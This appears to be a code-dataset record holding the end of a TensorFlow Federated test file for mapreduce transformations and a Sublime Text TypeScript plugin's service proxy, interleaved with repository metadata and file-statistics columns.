def test_binds_single_element_tuple_to_lower_lambda(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
zeroth_index_extracted = (
mapreduce_transformations
.zip_selection_as_argument_to_lower_level_lambda(lam, [[0]]))
self.assertEqual(zeroth_index_extracted.type_signature, lam.type_signature)
self.assertIsInstance(zeroth_index_extracted, building_blocks.Lambda)
self.assertIsInstance(zeroth_index_extracted.result, building_blocks.Call)
self.assertIsInstance(zeroth_index_extracted.result.function,
building_blocks.Lambda)
self.assertEqual(
str(zeroth_index_extracted.result.function),
'(_var2 -> federated_map(<(_var3 -> _var3[0]),_var2>))')
self.assertEqual(
str(zeroth_index_extracted.result.argument),
'federated_map(<(_var4 -> <_var4>),<_var1[0]>[0]>)')
def test_binds_single_argument_to_lower_lambda(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
zeroth_index_extracted = mapreduce_transformations.bind_single_selection_as_argument_to_lower_level_lambda(
lam, 0)
self.assertEqual(zeroth_index_extracted.type_signature, lam.type_signature)
self.assertIsInstance(zeroth_index_extracted, building_blocks.Lambda)
self.assertIsInstance(zeroth_index_extracted.result, building_blocks.Call)
self.assertIsInstance(zeroth_index_extracted.result.function,
building_blocks.Lambda)
self.assertRegex(
str(zeroth_index_extracted.result.function), r'\((.{4})1 -> (\1)1\)')
self.assertEqual(str(zeroth_index_extracted.result.argument), '_var1[0]')
def test_binding_single_arg_leaves_no_unbound_references(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
zeroth_index_extracted = mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0]])
unbound_references = transformations.get_map_of_unbound_references(
zeroth_index_extracted)[zeroth_index_extracted]
self.assertEmpty(unbound_references)
def test_binds_single_arg_deep_in_type_tree_to_lower_lambda(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[[fed_at_clients], fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types),
index=0),
index=0))
deep_zeroth_index_extracted = mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0, 0]])
self.assertEqual(deep_zeroth_index_extracted.type_signature,
lam.type_signature)
self.assertIsInstance(deep_zeroth_index_extracted, building_blocks.Lambda)
self.assertIsInstance(deep_zeroth_index_extracted.result,
building_blocks.Call)
self.assertIsInstance(deep_zeroth_index_extracted.result.function,
building_blocks.Lambda)
self.assertEqual(
str(deep_zeroth_index_extracted.result.function),
'(_var2 -> federated_map(<(_var3 -> _var3[0]),_var2>))')
# The below is not clear to me...ah, it makes more sense now...
self.assertEqual(
str(deep_zeroth_index_extracted.result.argument),
'federated_map(<(_var4 -> <_var4>),<_var1[0][0]>[0]>)')
def test_binds_multiple_args_deep_in_type_tree_to_lower_lambda(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[[fed_at_clients], fed_at_server, [fed_at_clients]])
first_selection = building_blocks.Selection(
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0),
index=0)
second_selection = building_blocks.Selection(
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=2),
index=0)
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Tuple([first_selection, second_selection]))
deep_zeroth_index_extracted = mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0, 0], [2, 0]])
self.assertEqual(deep_zeroth_index_extracted.type_signature,
lam.type_signature)
self.assertIsInstance(deep_zeroth_index_extracted, building_blocks.Lambda)
self.assertIsInstance(deep_zeroth_index_extracted.result,
building_blocks.Call)
self.assertIsInstance(deep_zeroth_index_extracted.result.function,
building_blocks.Lambda)
self.assertEqual(
str(deep_zeroth_index_extracted.result.function),
'(_var2 -> <federated_map(<(_var3 -> _var3[0]),_var2>),'
'federated_map(<(_var4 -> _var4[1]),_var2>)>)')
self.assertEqual(
str(deep_zeroth_index_extracted.result.argument),
'federated_map(<(_var5 -> <_var5[0],_var5[1]>),federated_map(<(_var6 -> _var6),(let _var7=<_var1[0][0],_var1[2][0]> in federated_zip_at_clients(<_var7[0],_var7[1]>))>)>)'
)
def test_binding_multiple_args_results_in_unique_names(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[[fed_at_clients], fed_at_server, [fed_at_clients]])
first_selection = building_blocks.Selection(
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0),
index=0)
second_selection = building_blocks.Selection(
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=2),
index=0)
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Tuple([first_selection, second_selection]))
deep_zeroth_index_extracted = mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0, 0], [2, 0]])
tree_analysis.check_has_unique_names(deep_zeroth_index_extracted)
class SelectFederatedOutputFromLambdaTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
mapreduce_transformations.select_output_from_lambda(None, 0)
def test_raises_on_non_lambda(self):
fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
ref = building_blocks.Reference('x', [fed_type])
with self.assertRaises(TypeError):
mapreduce_transformations.select_output_from_lambda(ref, 0)
def test_raises_on_string_indices(self):
fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
ref = building_blocks.Reference('x', [('a', fed_type)])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
with self.assertRaises(TypeError):
mapreduce_transformations.select_output_from_lambda(lam, 'a')
def test_raises_on_list_of_strings(self):
fed_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
ref = building_blocks.Reference('x', [[('a', fed_type)]])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
with self.assertRaises(TypeError):
mapreduce_transformations.select_output_from_lambda(lam, ['a'])
def test_selects_single_federated_output(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
ref = building_blocks.Reference('x', [fed_at_clients, fed_at_server])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
zero_selected = mapreduce_transformations.select_output_from_lambda(lam, 0)
self.assertEqual(zero_selected.type_signature.parameter,
lam.type_signature.parameter)
self.assertEqual(zero_selected.type_signature.result,
lam.type_signature.result[0])
self.assertEqual(str(zero_selected), '(x -> (let _var1=x in _var1[0]))')
def test_selects_tuple_of_federated_outputs(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
ref = building_blocks.Reference(
'x', [fed_at_clients, fed_at_clients, fed_at_server])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
tuple_selected = mapreduce_transformations.select_output_from_lambda(
lam, (0, 1))
self.assertEqual(tuple_selected.type_signature.parameter,
lam.type_signature.parameter)
self.assertEqual(
tuple_selected.type_signature.result,
computation_types.NamedTupleType(
[lam.type_signature.result[0], lam.type_signature.result[1]]))
self.assertEqual(
str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')
def test_selects_list_of_federated_outputs(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
ref = building_blocks.Reference(
'x', [fed_at_clients, fed_at_clients, fed_at_server])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
tuple_selected = mapreduce_transformations.select_output_from_lambda(
lam, [0, 1])
self.assertEqual(tuple_selected.type_signature.parameter,
lam.type_signature.parameter)
self.assertEqual(
tuple_selected.type_signature.result,
computation_types.NamedTupleType(
[lam.type_signature.result[0], lam.type_signature.result[1]]))
self.assertEqual(
str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')
def test_selects_single_unplaced_output(self):
ref = building_blocks.Reference('x', [tf.int32, tf.float32, tf.int32])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
int_selected = mapreduce_transformations.select_output_from_lambda(lam, 0)
self.assertEqual(int_selected.type_signature.parameter,
lam.type_signature.parameter)
self.assertEqual(int_selected.type_signature.result,
lam.type_signature.result[0])
def test_selects_multiple_unplaced_outputs(self):
ref = building_blocks.Reference('x', [tf.int32, tf.float32, tf.int32])
lam = building_blocks.Lambda('x', ref.type_signature, ref)
tuple_selected = mapreduce_transformations.select_output_from_lambda(
lam, [0, 1])
self.assertEqual(tuple_selected.type_signature.parameter,
lam.type_signature.parameter)
self.assertEqual(
tuple_selected.type_signature.result,
computation_types.NamedTupleType(
[lam.type_signature.result[0], lam.type_signature.result[1]]))
self.assertEqual(
str(tuple_selected), '(x -> (let _var1=x in <_var1[0],_var1[1]>))')
class ConcatenateFunctionOutputsTest(absltest.TestCase):
def test_raises_on_non_lambda_args(self):
reference = building_blocks.Reference('x', tf.int32)
tff_lambda = building_blocks.Lambda('x', tf.int32, reference)
with self.assertRaises(TypeError):
mapreduce_transformations.concatenate_function_outputs(
tff_lambda, reference)
with self.assertRaises(TypeError):
mapreduce_transformations.concatenate_function_outputs(
reference, tff_lambda)
def test_raises_on_non_unique_names(self):
reference = building_blocks.Reference('x', tf.int32)
good_lambda = building_blocks.Lambda('x', tf.int32, reference)
bad_lambda = building_blocks.Lambda('x', tf.int32, good_lambda)
with self.assertRaises(ValueError):
mapreduce_transformations.concatenate_function_outputs(
good_lambda, bad_lambda)
with self.assertRaises(ValueError):
mapreduce_transformations.concatenate_function_outputs(
bad_lambda, good_lambda)
def test_raises_on_different_parameter_types(self):
int_reference = building_blocks.Reference('x', tf.int32)
int_lambda = building_blocks.Lambda('x', tf.int32, int_reference)
float_reference = building_blocks.Reference('x', tf.float32)
float_lambda = building_blocks.Lambda('x', tf.float32, float_reference)
with self.assertRaises(TypeError):
mapreduce_transformations.concatenate_function_outputs(
int_lambda, float_lambda)
def test_parameters_are_mapped_together(self):
x_reference = building_blocks.Reference('x', tf.int32)
x_lambda = building_blocks.Lambda('x', tf.int32, x_reference)
y_reference = building_blocks.Reference('y', tf.int32)
y_lambda = building_blocks.Lambda('y', tf.int32, y_reference)
concatenated = mapreduce_transformations.concatenate_function_outputs(
x_lambda, y_lambda)
parameter_name = concatenated.parameter_name
def _raise_on_other_name_reference(comp):
if isinstance(comp,
building_blocks.Reference) and comp.name != parameter_name:
raise ValueError
return comp, True
tree_analysis.check_has_unique_names(concatenated)
transformation_utils.transform_postorder(concatenated,
_raise_on_other_name_reference)
def test_concatenates_identities(self):
x_reference = building_blocks.Reference('x', tf.int32)
x_lambda = building_blocks.Lambda('x', tf.int32, x_reference)
y_reference = building_blocks.Reference('y', tf.int32)
y_lambda = building_blocks.Lambda('y', tf.int32, y_reference)
concatenated = mapreduce_transformations.concatenate_function_outputs(
x_lambda, y_lambda)
self.assertEqual(str(concatenated), '(_var1 -> <_var1,_var1>)')
class NormalizedBitTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
mapreduce_transformations.normalize_all_equal_bit(None)
def test_converts_all_equal_at_clients_reference_to_not_equal(self):
fed_type_all_equal = computation_types.FederatedType(
tf.int32, placements.CLIENTS, all_equal=True)
normalized_comp = mapreduce_transformations.normalize_all_equal_bit(
building_blocks.Reference('x', fed_type_all_equal))
self.assertEqual(
normalized_comp.type_signature,
computation_types.FederatedType(
tf.int32, placements.CLIENTS, all_equal=False))
self.assertIsInstance(normalized_comp, building_blocks.Reference)
self.assertEqual(str(normalized_comp), 'x')
def test_converts_not_all_equal_at_server_reference_to_equal(self):
fed_type_not_all_equal = computation_types.FederatedType(
tf.int32, placements.SERVER, all_equal=False)
normalized_comp = mapreduce_transformations.normalize_all_equal_bit(
building_blocks.Reference('x', fed_type_not_all_equal))
self.assertEqual(
normalized_comp.type_signature,
computation_types.FederatedType(
tf.int32, placements.SERVER, all_equal=True))
self.assertIsInstance(normalized_comp, building_blocks.Reference)
self.assertEqual(str(normalized_comp), 'x')
def test_converts_all_equal_at_clients_lambda_parameter_to_not_equal(self):
fed_type_all_equal = computation_types.FederatedType(
tf.int32, placements.CLIENTS, all_equal=True)
normalized_fed_type = computation_types.FederatedType(
tf.int32, placements.CLIENTS)
ref = building_blocks.Reference('x', fed_type_all_equal)
lam = building_blocks.Lambda('x', fed_type_all_equal, ref)
normalized_lambda = mapreduce_transformations.normalize_all_equal_bit(lam)
self.assertEqual(
lam.type_signature,
computation_types.FunctionType(fed_type_all_equal, fed_type_all_equal))
self.assertIsInstance(normalized_lambda, building_blocks.Lambda)
self.assertEqual(str(normalized_lambda), '(x -> x)')
self.assertEqual(
normalized_lambda.type_signature,
computation_types.FunctionType(normalized_fed_type,
normalized_fed_type))
def test_converts_not_all_equal_at_server_lambda_parameter_to_equal(self):
fed_type_not_all_equal = computation_types.FederatedType(
tf.int32, placements.SERVER, all_equal=False)
normalized_fed_type = computation_types.FederatedType(
tf.int32, placements.SERVER)
ref = building_blocks.Reference('x', fed_type_not_all_equal)
lam = building_blocks.Lambda('x', fed_type_not_all_equal, ref)
normalized_lambda = mapreduce_transformations.normalize_all_equal_bit(lam)
self.assertEqual(
lam.type_signature,
computation_types.FunctionType(fed_type_not_all_equal,
fed_type_not_all_equal))
self.assertIsInstance(normalized_lambda, building_blocks.Lambda)
self.assertEqual(str(normalized_lambda), '(x -> x)')
self.assertEqual(
normalized_lambda.type_signature,
computation_types.FunctionType(normalized_fed_type,
normalized_fed_type))
def test_converts_federated_map_all_equal_to_federated_map(self):
fed_type_all_equal = computation_types.FederatedType(
tf.int32, placements.CLIENTS, all_equal=True)
normalized_fed_type = computation_types.FederatedType(
tf.int32, placements.CLIENTS)
int_ref = building_blocks.Reference('x', tf.int32)
int_identity = building_blocks.Lambda('x', tf.int32, int_ref)
federated_int_ref = building_blocks.Reference('y', fed_type_all_equal)
called_federated_map_all_equal = computation_constructing_utils.create_federated_map_all_equal(
int_identity, federated_int_ref)
normalized_federated_map = mapreduce_transformations.normalize_all_equal_bit(
called_federated_map_all_equal)
self.assertEqual(called_federated_map_all_equal.function.uri,
intrinsic_defs.FEDERATED_MAP_ALL_EQUAL.uri)
self.assertIsInstance(normalized_federated_map, building_blocks.Call)
self.assertIsInstance(normalized_federated_map.function,
building_blocks.Intrinsic)
self.assertEqual(normalized_federated_map.function.uri,
intrinsic_defs.FEDERATED_MAP.uri)
self.assertEqual(normalized_federated_map.type_signature,
normalized_fed_type)
if __name__ == '__main__':
tf.enable_v2_behavior()
absltest.main()
| 49.59434
| 178
| 0.739721
| 4,287
| 36,799
| 5.952181
| 0.074644
| 0.079555
| 0.052279
| 0.043265
| 0.850335
| 0.817964
| 0.785163
| 0.748717
| 0.711722
| 0.682996
| 0
| 0.011565
| 0.175249
| 36,799
| 741
| 179
| 49.661269
| 0.829193
| 0.017935
| 0
| 0.642746
| 0
| 0.00156
| 0.028818
| 0.010658
| 0
| 0
| 0
| 0
| 0.184087
| 1
| 0.090484
| false
| 0.00312
| 0.031201
| 0.00312
| 0.138846
| 0.00156
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c3f6c840ec1807a1b263aeece91c1bb57e3be54
| 16,307
|
py
|
Python
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 1,688
|
2015-04-01T19:48:34.000Z
|
2019-05-06T10:18:55.000Z
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 584
|
2015-04-01T19:21:43.000Z
|
2019-05-05T23:50:05.000Z
|
typescript/libs/service_proxy.py
|
bertilnilsson/TypeScript-Sublime-Plugin
|
268ddfec73ff33394c6cf5bc70ca36a30899fa20
|
[
"Apache-2.0"
] | 268
|
2015-04-02T19:05:38.000Z
|
2019-04-28T15:08:57.000Z
|
import sublime
from . import json_helpers
from .global_vars import IS_ST2
from .node_client import CommClient
from .text_helpers import Location
class ServiceProxy:
def __init__(self, worker_client=CommClient(), server_client=CommClient()):
self.__comm = server_client
self.__worker_comm = worker_client
self.seq = 1
def increase_seq(self):
temp = self.seq
self.seq += 1
return temp
def exit(self):
req_dict = self.create_req_dict("exit")
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def stop_worker(self):
req_dict = self.create_req_dict("exit")
json_str = json_helpers.encode(req_dict)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def configure(self, host_info="Sublime Text", file=None, format_options=None):
args = {"hostInfo": host_info, "formatOptions": format_options, "file": file}
req_dict = self.create_req_dict("configure", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
self.set_inferred_project_compiler_options()
def set_inferred_project_compiler_options(self):
""" Add full type support for compilers running in file scope mode """
compiler_options = {
"target": "ESNext", # enable all es-next features
"allowJs": True, # enable javascript support
"jsx": "Preserve", # enable jsx support
"noEmit": True # do not emit outputs
}
args = { "options": compiler_options }
req_dict = self.create_req_dict("compilerOptionsForInferredProjects", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=""):
args = {
"file": path,
"line": begin_location.line,
"offset": begin_location.offset,
"endLine": end_location.line,
"endOffset": end_location.offset,
"insertString": insertString
}
req_dict = self.create_req_dict("change", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def completions(self, path, location=Location(1, 1), prefix="", on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix}
req_dict = self.create_req_dict("completions", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmd(
json_str,
lambda response_dict: None if on_completed is None else on_completed(response_dict),
req_dict["seq"]
)
def async_completions(self, path, location=Location(1, 1), prefix="", on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix}
req_dict = self.create_req_dict("completions", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
def signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix}
req_dict = self.create_req_dict("signatureHelp", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmd(
json_str,
lambda response_dict: None if on_completed is None else on_completed(response_dict),
req_dict["seq"]
)
def async_signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix}
req_dict = self.create_req_dict("signatureHelp", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
def definition(self, path, location=Location(1, 1)):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("definition", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def type_definition(self, path, location=Location(1, 1)):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("typeDefinition", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)):
args = {
"file": path,
"line": begin_location.line,
"offset": begin_location.offset,
"endLine": end_location.line,
"endOffset": end_location.offset
}
req_dict = self.create_req_dict("format", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def format_on_key(self, path, location=Location(1, 1), key=""):
args = {"file": path, "line": location.line, "offset": location.offset, "key": key}
req_dict = self.create_req_dict("formatonkey", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def organize_imports(self, path):
args = {
"scope": {
"type": "file",
"args": {
"file": path
}
},
}
req_dict = self.create_req_dict("organizeImports", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def open(self, path):
args = {"file": path}
req_dict = self.create_req_dict("open", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def open_on_worker(self, path):
args = {"file": path}
req_dict = self.create_req_dict("open", args)
json_str = json_helpers.encode(req_dict)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def close(self, path):
args = {"file": path}
req_dict = self.create_req_dict("close", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def references(self, path, location=Location(1, 1)):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("references", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def reload(self, path, alternate_path):
args = {"file": path, "tmpfile": alternate_path}
req_dict = self.create_req_dict("reload", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def reload_on_worker(self, path, alternate_path):
args = {"file": path, "tmpfile": alternate_path}
req_dict = self.create_req_dict("reload", args)
json_str = json_helpers.encode(req_dict)
if self.__worker_comm.started():
response_dict = self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def reload_async(self, path, alternate_path, on_completed):
args = {"file": path, "tmpfile": alternate_path}
req_dict = self.create_req_dict("reload", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"])
def reload_async_on_worker(self, path, alternate_path, on_completed):
args = {"file": path, "tmpfile": alternate_path}
req_dict = self.create_req_dict("reload", args)
json_str = json_helpers.encode(req_dict)
if self.__worker_comm.started():
self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"])
def rename(self, path, location=Location(1, 1)):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("rename", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
if self.__worker_comm.started():
self.__worker_comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed):
args = {
"file": path,
"startLine": start_loc.line,
"startOffset": start_loc.offset,
"endLine": end_loc.line,
"endOffset": end_loc.offset,
}
req_dict = self.create_req_dict("getApplicableRefactors", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed):
args = {
"file": path,
"startLine": start_loc.line,
"startOffset": start_loc.offset,
"endLine": end_loc.line,
"endOffset": end_loc.offset,
"refactor": refactor_name,
"action": action_name,
}
req_dict = self.create_req_dict("getEditsForRefactor", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
#on_completed(response_dict)
#return response_dict
def request_get_err(self, delay=0, pathList=[]):
args = {"files": pathList, "delay": delay}
req_dict = self.create_req_dict("geterr", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
def request_get_err_for_project(self, delay=0, path=""):
args = {"file": path, "delay": delay}
req_dict = self.create_req_dict("geterrForProject", args)
json_str = json_helpers.encode(req_dict)
if self.__worker_comm.started():
self.__worker_comm.postCmd(json_str)
def type(self, path, location=Location(1, 1)):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("type", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def quick_info(self, path, location=Location(1, 1), on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("quickinfo", args)
json_str = json_helpers.encode(req_dict)
callback = on_completed or (lambda: None)
if not IS_ST2:
self.__comm.sendCmdAsync(
json_str,
callback,
req_dict["seq"]
)
else:
self.__comm.sendCmd(
json_str,
callback,
req_dict["seq"]
)
def quick_info_full(self, path, location=Location(1, 1), on_completed=None):
args = {"file": path, "line": location.line, "offset": location.offset}
req_dict = self.create_req_dict("quickinfo-full", args)
json_str = json_helpers.encode(req_dict)
callback = on_completed or (lambda: None)
if not IS_ST2:
self.__comm.sendCmdAsync(
json_str,
callback,
req_dict["seq"]
)
else:
self.__comm.sendCmd(
json_str,
callback,
req_dict["seq"]
)
def save_to(self, path, alternatePath):
args = {"file": path, "tmpfile": alternatePath}
req_dict = self.create_req_dict("saveto", args)
json_str = json_helpers.encode(req_dict)
self.__comm.postCmd(json_str)
def nav_to(self, search_text, file_name):
args = {"searchValue": search_text, "file": file_name, "maxResultCount": 20}
req_dict = self.create_req_dict("navto", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def project_info(self, file_name, need_file_name_list=False):
args = {"file": file_name, "needFileNameList": need_file_name_list}
req_dict = self.create_req_dict("projectInfo", args)
json_str = json_helpers.encode(req_dict)
return self.__comm.sendCmdSync(json_str, req_dict["seq"])
def async_document_highlights(self, path, location, on_completed=None):
args = {"line": location.line, "offset": location.offset, "file": path, "filesToSearch": [path]}
req_dict = self.create_req_dict("documentHighlights", args)
json_str = json_helpers.encode(req_dict)
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"])
def add_event_handler(self, event_name, cb):
self.__comm.add_event_handler(event_name, cb)
def add_event_handler_for_worker(self, event_name, cb):
self.__worker_comm.add_event_handler(event_name, cb)
def create_req_dict(self, command_name, args=None):
req_dict = {
"command": command_name,
"seq": self.increase_seq(),
"type": "request"
}
if args:
req_dict["arguments"] = args
return req_dict
def get_semantic_errors(self, path):
args = {
"file": path
}
req_dict = self.create_req_dict("semanticDiagnosticsSync", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def get_syntactic_errors(self, path):
args = {
"file": path
}
req_dict = self.create_req_dict("syntacticDiagnosticsSync", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes):
args = {
"file": path,
"startLine": startLine,
"startOffset": startOffset,
"endLine": endLine,
"endOffset": endOffset,
"errorCodes": errorCodes
}
req_dict = self.create_req_dict("getCodeFixes", args)
json_str = json_helpers.encode(req_dict)
response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"])
return response_dict
| 42.136951
| 111
| 0.633777
| 1,989
| 16,307
| 4.84917
| 0.087984
| 0.108139
| 0.059305
| 0.065215
| 0.785277
| 0.773665
| 0.743183
| 0.737792
| 0.714049
| 0.70534
| 0
| 0.003355
| 0.25069
| 16,307
| 386
| 112
| 42.246114
| 0.785907
| 0.008524
| 0
| 0.590504
| 0
| 0
| 0.075637
| 0.006401
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020772
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
